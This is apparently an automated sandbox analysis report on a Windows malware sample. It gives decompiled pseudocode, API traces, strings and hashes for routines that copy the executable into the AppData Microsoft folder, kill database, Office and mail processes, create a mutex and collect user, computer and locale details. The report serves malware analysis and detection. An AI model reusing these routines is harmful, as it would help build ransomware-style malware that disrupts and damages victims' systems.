Part of subcall function 0F142F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F142FA8
Part of subcall function 0F142F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F142FCF
Part of subcall function 0F142F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F142FE3
Part of subcall function 0F142F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F142FFA

ExitThread.KERNEL32 ref: 0F142F3F

Part of subcall function 0F142AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F142AEA
Part of subcall function 0F142AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F142B2C
Part of subcall function 0F142AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F142B38
Part of subcall function 0F142AD0: ExitThread.KERNEL32 ref: 0F142C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F142EC8
UpdateWindow.USER32(00000000), ref: 0F142ECF
CreateThread.KERNEL32 ref: 0F142EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F142EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F142F05
TranslateMessage.USER32(?), ref: 0F142F1C
DispatchMessageW.USER32 ref: 0F142F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F142F37

Strings

f, xrefs: 0F142DA1
s, xrefs: 0F142DB9
firefox, xrefs: 0F142E9B
1, xrefs: 0F142D6F
d, xrefs: 0F142DA9
win32app, xrefs: 0F142E51, 0F142EA0
s, xrefs: 0F142D77
s, xrefs: 0F142DC1
s, xrefs: 0F142D7F
k, xrefs: 0F142D67
0, xrefs: 0F142DF1
w, xrefs: 0F142DB1

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: e058e58fe8f616008d40985dd8100d70ef5580f741929388c8804c13e2b5d6a7
Instruction ID: c09f69e4e6adec391483c8dac804f3f1c5db6c8dcd4e68adf4f8008f2f219120
Opcode Fuzzy Hash: e058e58fe8f616008d40985dd8100d70ef5580f741929388c8804c13e2b5d6a7
Instruction Fuzzy Hash: E6518074688341AFE3109F61CC09B5B7BE4AF84B55F50091CF684AA2C1D7B8F199CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F142AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F142AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F1481F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F1482B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F1481F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F142890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F142960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0f142ad6
0x0f142aea
0x0f142af0
0x0f142af4
0x0f142af6
0x0f142b00
0x0f142b1c
0x0f142b1e
0x0f142b1e
0x0f142b02
0x0f142b02
0x0f142b02
0x0f142b08
0x0f142b10
0x0f142b12
0x0f142b14
0x0f142b14
0x0f142b28
0x0f142b2c
0x0f142b38
0x0f142b3e
0x0f142b43
0x0f142b48
0x0f142b4a
0x0f142b55
0x0f142b62
0x0f142b67
0x0f142b6c
0x0f142b75
0x0f142b89
0x0f142b8e
0x0f142b9c
0x0f142ba2
0x0f142ba5
0x0f142ba7
0x0f142bac
0x0f142bae
0x0f142be4
0x0f142bec
0x0f142bf4
0x0f142bf6
0x0f142bfd
0x0f142c02
0x0f142c05
0x0f142c07
0x00000000
0x00000000
0x0f142c0f
0x0f142c11
0x0f142c16
0x0f142c1d
0x0f142c2c
0x0f142c2c
0x0f142c2c
0x0f142c2e
0x0f142c2e
0x0f142c2f
0x0f142c35
0x0f142c3b
0x00000000
0x0f142c3d
0x0f142c25
0x0f142c2a
0x00000000
0x00000000
0x00000000
0x0f142c2a
0x0f142bb6
0x0f142bb8
0x0f142bbd
0x0f142bc4
0x0f142bd3
0x0f142bd3
0x0f142bd3
0x0f142bd5
0x0f142bd5
0x00000000
0x0f142bd5
0x0f142bcc
0x0f142bd1
0x00000000
0x00000000
0x00000000
0x0f142b4c
0x0f142b4c
0x0f142c40
0x0f142c40
0x0f142c45
0x0f142c47
0x0f142c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F142AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F142B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F142B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F142B7D

Part of subcall function 0F1482B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
Part of subcall function 0F1482B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
Part of subcall function 0F1482B0: GetModuleHandleA.KERNEL32(?), ref: 0F14834F
Part of subcall function 0F1482B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
Part of subcall function 0F1482B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
Part of subcall function 0F1482B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
Part of subcall function 0F1482B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F142B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F142BE4
lstrcatW.KERNEL32(00000000,?), ref: 0F142BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0F142BF4
wsprintfW.USER32 ref: 0F142C35
ExitThread.KERNEL32 ref: 0F142C47

Strings

.exe, xrefs: 0F142BEE
U, xrefs: 0F142B75
I, xrefs: 0F142B6C
AppData, xrefs: 0F142B97
P, xrefs: 0F142B55
"%s", xrefs: 0F142C2F
\Microsoft\, xrefs: 0F142BDE

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 0b0746d27575f4c20da221b732bb0b7e3298566cbb58a490d914f19b22cc9836
Instruction ID: 13167adf162c0deaad7b641690974352a0c935d9d64dd98c8fb5617c5ebc28c7
Opcode Fuzzy Hash: 0b0746d27575f4c20da221b732bb0b7e3298566cbb58a490d914f19b22cc9836
Instruction Fuzzy Hash: 5241B375244310AFE304DF20DC49F6B7BD8AFC4715F054428B54997282DBB8F9A9CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F1448C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0F1448C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0f1448c6
0x0f1448d3
0x0f1448db
0x0f1448e3
0x0f1448eb
0x0f1448f3
0x0f1448fb
0x0f144903
0x0f14490b
0x0f144913
0x0f14491b
0x0f144923
0x0f14492b
0x0f144933
0x0f14493b
0x0f144943
0x0f14494b
0x0f144953
0x0f14495b
0x0f144963
0x0f14496b
0x0f144973
0x0f14497b
0x0f144983
0x0f14498b
0x0f144993
0x0f14499b
0x0f1449a3
0x0f1449ae
0x0f1449b9
0x0f1449c4
0x0f1449cf
0x0f1449da
0x0f1449e5
0x0f1449f0
0x0f1449fb
0x0f144a06
0x0f144a11
0x0f144a1c
0x0f144a27
0x0f144a32
0x0f144a44
0x0f144a48
0x0f144a4c
0x0f144a52
0x0f144a56
0x0f144a58
0x0f144a61
0x0f144a63
0x0f144a65
0x0f144a65
0x0f144a61
0x0f144a71
0x0f144a71
0x0f144a74
0x0f144a74
0x0f144a80
0x0f144a85
0x0f144a8d
0x0f144a9b
0x0f144a9f
0x0f144aa4
0x0f144ab1
0x0f144ab1
0x0f144a9f
0x0f144abb
0x0f144abc
0x0f144abc
0x0f144abf
0x0f144ac4
0x0f144aca
0x0f144ad0
0x0f144ad0
0x0f144ad3
0x0f144ad9
0x0f144ae3
0x0f144ae3
0x0f144aea
0x0f144af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F144A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F144A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F144A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F144A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F144A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F144AA4
CloseHandle.KERNEL32(00000000), ref: 0F144AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F144ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F144AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F144AEA

Strings

i)w, xrefs: 0F144A85

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3023235786-1280834553
Opcode ID: 59c314e766b8a44cb9f17b7a4026036a6a665e31ca343524f8f0a1154e62c182
Instruction ID: 7464e5c6e66af168a0f9a912ea23405ef477e7dcbad88357fc1bca475e12e2e1
Opcode Fuzzy Hash: 59c314e766b8a44cb9f17b7a4026036a6a665e31ca343524f8f0a1154e62c182
Instruction Fuzzy Hash: 05513AB91483819FD320CF11964874BBBE4AFC1719F61490CE9996B352C774B82ECF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0F1447D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C

Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2

Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14482C
lstrcpyW.KERNEL32 ref: 0F14484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14489B

Strings

Global\, xrefs: 0F144849

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: e6f87d386d95abd582d3c784e4526ea7316f7441f9f82ad86753c58c55856784
Instruction ID: 8fb27086326ab75ee5aff3720d904a63a1604bf5d08a4bb6e84bcd3fdfd31531
Opcode Fuzzy Hash: e6f87d386d95abd582d3c784e4526ea7316f7441f9f82ad86753c58c55856784
Instruction Fuzzy Hash: 9C21F3716903126BF224EBA4DC4AF7F7A5CDFC0B11F510628FA05A70C1AB98792886E5

Uniqueness

Uniqueness Score: -1.00%

Function 0F144A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F144A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0f144a78
0x0f144a78
0x0f144a80
0x0f144a80
0x0f144a85
0x0f144a8d
0x0f144a9b
0x0f144a9f
0x0f144aa4
0x0f144ab1
0x0f144ab1
0x0f144a9f
0x0f144abb
0x0f144abc
0x0f144abc
0x0f144ac2
0x00000000
0x00000000
0x0f144ac4
0x0f144ac4
0x0f144aca
0x0f144ad0
0x0f144ad0
0x0f144ad5
0x0f144a74
0x0f144a80
0x00000000
0x00000000
0x00000000
0x0f144a80
0x0f144ad9
0x0f144ae3
0x0f144ae3
0x0f144aea
0x0f144af2
0x0f144a80
0x0f144a85
0x0f144a8d
0x0f144a9b
0x0f144a9f
0x0f144aa4
0x0f144ab1
0x0f144ab1
0x0f144a9f
0x0f144abb
0x0f144abc
0x0f144abc
0x0f144abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F144A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F144A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F144AA4
CloseHandle.KERNEL32(00000000), ref: 0F144AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F144ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F144AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F144AEA

Strings

i)w, xrefs: 0F144A85

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 3573210778-1280834553
Opcode ID: a6e02bf0f2f0aea231b629aea495adb3a51d3c7095f9939c29f2206f92affe3a
Instruction ID: 6f9c6774449a21f788685744765d815a7277baa63ac25cfc1100295587a8367c
Opcode Fuzzy Hash: a6e02bf0f2f0aea231b629aea495adb3a51d3c7095f9939c29f2206f92affe3a
Instruction Fuzzy Hash: 4001DB76280201ABD7209F50AC45B5A736CEFC4712F324014FE0B97041D725B8688BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0F1435C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1435C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0F1434F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0f1435dc
0x0f1435df
0x0f1435e2
0x0f1435e9
0x0f1435eb
0x0f1435ef
0x0f143600
0x0f143616
0x0f14361c
0x0f143621
0x0f143626
0x0f143636
0x0f143639
0x0f14363b
0x0f14363f
0x0f14364c
0x0f143654
0x0f14365a
0x0f14365f
0x0f143661
0x0f143661
0x0f143662
0x0f14366e
0x0f14367f
0x0f143682
0x0f143682
0x0f14365f
0x0f14368d
0x0f14368d
0x0f143694
0x0f143694
0x0f1436a2
0x0f1436b1
0x0f1435f6
0x0f1435f6
0x0f1435f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F1435E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F143600
